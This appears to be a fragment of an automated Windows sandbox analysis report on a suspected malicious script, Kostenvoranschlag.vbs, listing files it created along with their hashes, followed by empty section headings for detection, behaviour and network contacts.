C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F23953D4A58E404FCB67ADD0C45EB27A	2D75B5CACF2916C66E440F19F6B3B21DFD289340	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar1xfkvw.0r3.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bn4i2qzd.up3.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsvimkjj.k0z.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjevjoqm.b0s.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Commandoes.Gre	ASCII text, with very long lines (65536), with no line terminators	B96928578115B1191B03CAE7B3845CA1	F428A8A24FA8D5B18BCF369C420E3CFC95BB532F	299B31AD6705B0195D90DB6CDF9B12268976E4F7C0ABC89EA3B128F8B3932D50

Windows Analysis Report Kostenvoranschlag.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Kostenvoranschlag.vbs

Malware Threat Intel
Provided by